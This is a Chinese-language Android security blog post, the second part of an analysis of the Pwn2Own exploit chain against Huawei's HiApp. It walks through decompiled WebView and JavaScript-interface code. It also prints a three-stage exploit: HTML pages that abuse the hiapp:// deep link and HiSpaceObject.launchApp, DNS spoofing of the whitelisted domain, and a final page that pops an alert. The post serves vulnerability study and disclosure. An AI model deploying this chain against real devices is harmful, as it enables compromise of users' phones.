<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x01 前言Pwn2Own华为HiApp漏洞原理与利用分析(上) 阅读本篇的基础是先理解上篇的攻击构造链路。 0x02 漏洞分析不知道有没有细心的同学发现我在上篇分析文章中留下的彩蛋。本篇自然是从这个彩蛋切入.">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn2Own华为HiApp漏洞原理与利用分析(下)">
<meta property="og:url" content="http://example.com/2018/10/04/Pwn2Own%E5%8D%8E%E4%B8%BAHiApp%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-%E4%B8%8B/index.html">
<meta property="og:site_name" content="Tasfa&#39;s World!">
<meta property="og:description" content="0x01 前言Pwn2Own华为HiApp漏洞原理与利用分析(上) 阅读本篇的基础是先理解上篇的攻击构造链路。 0x02 漏洞分析不知道有没有细心的同学发现我在上篇分析文章中留下的彩蛋。本篇自然是从这个彩蛋切入.">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/Users/tasfa/Downloads/pwnHW.gif">
<meta property="article:published_time" content="2018-10-04T01:49:25.000Z">
<meta property="article:modified_time" content="2021-05-22T13:10:54.206Z">
<meta property="article:author" content="Tasfa">
<meta property="article:tag" content="Android漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/Users/tasfa/Downloads/pwnHW.gif">

<link rel="canonical" href="http://example.com/2018/10/04/Pwn2Own%E5%8D%8E%E4%B8%BAHiApp%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-%E4%B8%8B/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh'
  };
</script>

  <title>Pwn2Own华为HiApp漏洞原理与利用分析(下) | Tasfa's World!</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Tasfa's World!" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Tasfa's World!</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Try to Debug your heart!</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh">
    <link itemprop="mainEntityOfPage" href="http://example.com/2018/10/04/Pwn2Own%E5%8D%8E%E4%B8%BAHiApp%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-%E4%B8%8B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/uploads/atv.jpg">
      <meta itemprop="name" content="Tasfa">
      <meta itemprop="description" content="AndroidSecurity">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Tasfa's World!">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Pwn2Own华为HiApp漏洞原理与利用分析(下)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2018-10-04 09:49:25" itemprop="dateCreated datePublished" datetime="2018-10-04T09:49:25+08:00">2018-10-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-05-22 21:10:54" itemprop="dateModified" datetime="2021-05-22T21:10:54+08:00">2021-05-22</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Android%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">Android安全</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Android%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" itemprop="url" rel="index"><span itemprop="name">漏洞分析</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h3><p><a target="_blank" rel="noopener" href="http://www.freebuf.com/articles/terminal/172780.html">Pwn2Own华为HiApp漏洞原理与利用分析(上)</a></p>
<p>阅读本篇的基础是先理解上篇的攻击构造链路。</p>
<h3 id="0x02-漏洞分析"><a href="#0x02-漏洞分析" class="headerlink" title="0x02 漏洞分析"></a>0x02 漏洞分析</h3><p>不知道有没有细心的同学发现我在上篇分析文章中留下的<strong>彩蛋</strong>。<br>本篇自然是从这个彩蛋切入.</p>
<span id="more"></span>


<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">this</span>.mWebvewDelegate.initView(((Context)<span class="keyword">this</span>), request);<span class="comment">//我是彩蛋</span></span><br><span class="line"><span class="keyword">this</span>.mWebvewDelegate.loadPage(url);  <span class="comment">// 加载url</span></span><br></pre></td></tr></table></figure>
<p>从上篇的分析我们已经知道mWebvewDelegate的实例类为: <code>InternalWebviewDelegate</code>,那么切入InternalWebviewDelegate.initView函数进行分析。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">initView</span><span class="params">(Context arg6, Request arg7)</span> </span>&#123;</span><br><span class="line">       <span class="keyword">this</span>.mContext = arg6;</span><br><span class="line">       WebSettings v0 = <span class="keyword">this</span>.webview.getSettings();</span><br><span class="line">       ...</span><br><span class="line">       <span class="keyword">this</span>.webview.removeJavascriptInterface(<span class="string">&quot;accessibility&quot;</span>);</span><br><span class="line">       <span class="keyword">this</span>.webview.removeJavascriptInterface(<span class="string">&quot;accessibilityTraversal&quot;</span>);</span><br><span class="line">       <span class="keyword">if</span>(Build$VERSION.SDK_INT &gt;= <span class="number">17</span>) &#123;</span><br><span class="line">           <span class="keyword">this</span>.webview.removeJavascriptInterface(<span class="string">&quot;searchBoxJavaBridge_&quot;</span>);</span><br><span class="line">       &#125;</span><br><span class="line">       ...</span><br><span class="line">       <span class="keyword">this</span>.webview.getSettings().setJavaScriptEnabled(<span class="keyword">true</span>);<span class="comment">//允许执行js脚本</span></span><br><span class="line">       <span class="keyword">this</span>.webview.requestFocus();</span><br><span class="line">       <span class="keyword">this</span>.webview.setWebViewClient(<span class="keyword">new</span> InternalWebViewClient(<span class="keyword">this</span>));</span><br><span class="line">       <span class="keyword">this</span>.webview.setWebChromeClient(<span class="keyword">new</span> MarketWebChromeClient(<span class="keyword">this</span>));</span><br><span class="line">       <span class="keyword">this</span>.webview.getSettings().setBlockNetworkImage(<span class="keyword">true</span>);</span><br><span class="line">       <span class="keyword">this</span>.webview.addJavascriptInterface(<span class="keyword">new</span> HiSpaceObject(<span class="keyword">this</span>.mContext, ((JsCallBackOjbect)<span class="keyword">this</span>), <span class="keyword">this</span>.webview), <span class="string">&quot;HiSpaceObject&quot;</span>);  <span class="comment">// 关键点,暴露了一个对象</span></span><br><span class="line">       ...</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<p>审计此代码可以发现<code>setJavaScriptEnabled(true)</code>可执行js脚本,上篇分析我们已经可以通过DNS欺骗,使得最终加载的url为我们可构造的任意页面或脚本，也即是可控制js输入。</p>
<p>关于addJavascriptInterface的用法，可阅读参考文章。关键点就是HiSpaceObject.class类中的 @JavascriptInterface注解,有此注解的方法也就是我们可以控制调用的方法。其中包括安装APP,卸载APP等等函数。</p>
<p>根据漏洞作者描述,他们的主要目的是寻找RCE,而HiApp中又无法触发,因此需要寻找其他App的漏洞来触发，因此这里的重点是分析能不能启动其他App,而恰好又暴露了这样的方法。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@JavascriptInterface</span> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">launchApp</span><span class="params">(String pkgName, String uri)</span> </span>&#123;</span><br><span class="line">        URISyntaxException excrpt;</span><br><span class="line">        Intent intent;</span><br><span class="line">        a.a(<span class="string">&quot;HiSpaceObject&quot;</span>, <span class="string">&quot;launchApp&quot;</span>);</span><br><span class="line">        Intent newIntent = <span class="keyword">new</span> Intent();</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            intent = Intent.parseUri(uri, <span class="number">0</span>);<span class="comment">//关键点</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">catch</span>(URISyntaxException v0) &#123;</span><br><span class="line">            URISyntaxException v5 = v0;</span><br><span class="line">            intent = newIntent;</span><br><span class="line">            excrpt = v5;</span><br><span class="line">            goto label_15;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            intent.setPackage(pkgName);</span><br><span class="line">            goto label_8;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">catch</span>(URISyntaxException excrpt) &#123;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    label_15:</span><br><span class="line">        a.d(<span class="string">&quot;HiSpaceObject&quot;</span>, <span class="string">&quot;uri error!&quot;</span> + excrpt.toString());</span><br><span class="line">    label_8:</span><br><span class="line">        <span class="keyword">this</span>.mActivity.startActivity(intent);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>分析以上代码我们可以发现,主要是需要两个参数,pkgName和Uri，最后调用startActivity去启动Activity。</p>
<p>这里自然就有问题了,如果没有办法传递一些extra到activity,那便是没有我们可以控制的数据流，也因此是没用的。但是由于调用了<code>Intent.parseUri(uri, 0);</code>,那么是否有突破的机会？</p>
<p>通过查看源码可知(详见参考Intent.java)</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">* Flag for use with &#123;@link #toUri&#125; and &#123;@link #parseUri&#125;: the URI string</span><br><span class="line">* always has the &quot;android-app:&quot; scheme.  This is a variation of</span><br><span class="line">* &#123;@link #URI_INTENT_SCHEME&#125; whose format is simpler for the case of </span><br><span class="line">* http/https URI being delivered to a specific package name.  The format</span><br><span class="line">* is:</span><br><span class="line">* <span class="tag">&lt;<span class="name">pre</span> <span class="attr">class</span>=<span class="string">&quot;prettyprint&quot;</span>&gt;</span></span><br><span class="line">* android-app://&#123;package_id&#125;[/&#123;scheme&#125;[/&#123;host&#125;[/&#123;path&#125;]]][#Intent;&#123;...&#125;]</span><br><span class="line">* <span class="tag">&lt;/<span class="name">pre</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>因此可构造漏洞作者给出的PoC:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> pkg = <span class="string">&quot;com.huawei.hwireader&quot;</span>;<span class="keyword">var</span> uri = <span class="string">&quot;android-app://http/www.google.co.uk/#Intent;component=com.huawei.hwireader/com.zhangyue.iRe ader.online.ui.ActivityWeb;action=com.huawei.hwireader.SHOW_DETAIL;S.url=http://192 .168.137.1:8000/stage3.html;end&quot;</span>;<span class="built_in">window</span>.HiSpaceObject.launchApp(pkg,uri);</span><br></pre></td></tr></table></figure>
<p><code>http://192.168.137.1:8000/stage3.html</code> 这里加载的URL即为攻击payload</p>
<h3 id="0x03-漏洞利用"><a href="#0x03-漏洞利用" class="headerlink" title="0x03 漏洞利用"></a>0x03 漏洞利用</h3><p>可以本地搭建环境,也可使用vps。首先构造恶意网站exploit.html。诱导用户在浏览器中访问该页面。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>exploit huawei<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">     <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span> =<span class="string">&quot;text/javascript&quot;</span>&gt;</span> </span><br><span class="line"><span class="javascript"><span class="built_in">document</span>.location = <span class="string">&quot;hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&amp;params=&#123;&#x27;params&#x27; : [ &#123; &#x27;name&#x27; : &#x27;uri&#x27;, &#x27;type&#x27; : &#x27;String&#x27;, &#x27;value&#x27; : &#x27;internal_webview&#x27; &#125;, &#123; &#x27;name&#x27; : &#x27;url&#x27;, &#x27;type&#x27; : &#x27;String&#x27;, &#x27;value&#x27; : &#x27;http://www.vmall.com/exploit2.html&#x27; &#125; ] &#125;&amp;channelId=1&quot;</span>;</span></span><br><span class="line"> <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">     <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>紧接着使用DNS欺骗,目的是当<code>internal_webview</code>解析<code>www.vmall.com</code>时指向的ip地址为恶意攻击地址,同时构造exploit2.html,如下.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">title</span>&gt;</span>exploit huawei stage 2 <span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">          <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span> =<span class="string">&quot;text/javascript&quot;</span>&gt;</span></span><br><span class="line"><span class="javascript">          <span class="keyword">var</span> pkg = <span class="string">&quot;com.huawei.hwireader&quot;</span>;</span></span><br><span class="line"><span class="javascript"><span class="keyword">var</span> uri = <span class="string">&quot;android-app://http/www.google.co.uk/#Intent;component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;action=com.huawei.hwireader.SHOW_DETAIL;S.url=http://www.tasfa.cn/stage3.html;end&quot;</span>;</span></span><br><span class="line"><span class="javascript"><span class="built_in">window</span>.HiSpaceObject.launchApp(pkg,uri);</span></span><br><span class="line">          <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>exploit2.html的主要作用是调起IReader APP的存在漏洞的WebView,并使其加载任意的url。这里加载第三阶段我们可以控制的exploit3.html代码。</p>
<p>本次实验exploit3.html使用代码如下:(其他具体利用代码将在之后的分析报告中阐述)</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">         <span class="tag">&lt;<span class="name">title</span>&gt;</span>exploit huawei stage 3 <span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">          <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span> =<span class="string">&quot;text/javascript&quot;</span>&gt;</span></span><br><span class="line"><span class="javascript">          alert(<span class="string">&#x27;pwn huawei&#x27;</span>);</span></span><br><span class="line">          <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>完整过程可查看下面GIF:</p>
<p><img src="/Users/tasfa/Downloads/pwnHW.gif" alt="pwnhwGif"></p>
<h3 id="0x04-漏洞总结"><a href="#0x04-漏洞总结" class="headerlink" title="0x04 漏洞总结"></a>0x04 漏洞总结</h3><p>完整的攻击链路为: </p>
<ol>
<li>诱导用户访问恶意网站exploit.html。</li>
<li>使用DNS劫持或其他方式,绕过internal_webview的域名白名单限制。</li>
<li>调用起其他APP存在漏洞的可利用的webView,加载恶意攻击页面,从而完成整个攻击链路。</li>
</ol>
<h3 id="0x05-参考"><a href="#0x05-参考" class="headerlink" title="0x05 参考"></a>0x05 参考</h3><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/renhui/p/5899520.html">Android 4.2版本以下使用WebView组件addJavascriptInterface方法存在JS漏洞</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/ed0846a16659">使用 addJavaScriptInterface() 方法在 WebView 中绑定 Java 对象</a></p>
<p><a target="_blank" rel="noopener" href="http://androidxref.com/7.0.0_r1/xref/frameworks/base/core/java/android/content/Intent.java#4664">Intent.java</a></p>
<h3 id="0x06-声明"><a href="#0x06-声明" class="headerlink" title="0x06 声明"></a>0x06 声明</h3><p>本文章仅做学习研究用途，其他非法用途，本人概不负责。建议华为手机用户尽快更新HiApp以及IReader应用，以免遭到入侵控制，造成损失。</p>

    </div>

    
    
    
        <div class="reward-container">
  <div>坚持技术分享,感谢您的支持！</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    Donate
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/uploads/wechatpay.png" alt="Tasfa WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/uploads/alipay.png" alt="Tasfa Alipay">
        <p>Alipay</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Android%E6%BC%8F%E6%B4%9E/" rel="tag"># Android漏洞</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2018/10/03/Pwn2Own%E5%8D%8E%E4%B8%BAHiApp%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-%E4%B8%8A/" rel="prev" title="Pwn2Own华为HiApp漏洞原理与利用分析(上)">
      <i class="fa fa-chevron-left"></i> Pwn2Own华为HiApp漏洞原理与利用分析(上)
    </a></div>
      <div class="post-nav-item">
    <a href="/2018/10/05/Janus%E7%AD%BE%E5%90%8D%E6%BC%8F%E6%B4%9E-CVE-2017-13156-%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/" rel="next" title="Janus签名漏洞(CVE-2017-13156)原理与利用分析">
      Janus签名漏洞(CVE-2017-13156)原理与利用分析 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">0x01 前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">2.</span> <span class="nav-text">0x02 漏洞分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">3.</span> <span class="nav-text">0x03 漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">0x04 漏洞总结</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-%E5%8F%82%E8%80%83"><span class="nav-number">5.</span> <span class="nav-text">0x05 参考</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x06-%E5%A3%B0%E6%98%8E"><span class="nav-number">6.</span> <span class="nav-text">0x06 声明</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Tasfa"
      src="/uploads/atv.jpg">
  <p class="site-author-name" itemprop="name">Tasfa</p>
  <div class="site-description" itemprop="description">AndroidSecurity</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/tasfa" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;tasfa" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.freebuf.com/author/Tasfa" title="FreeBuf → https:&#x2F;&#x2F;www.freebuf.com&#x2F;author&#x2F;Tasfa" rel="noopener" target="_blank"><i class="fab fa-google fa-fw"></i>FreeBuf</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/qq_30135181" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_30135181" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>CSDN</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2014 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Tasfa</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
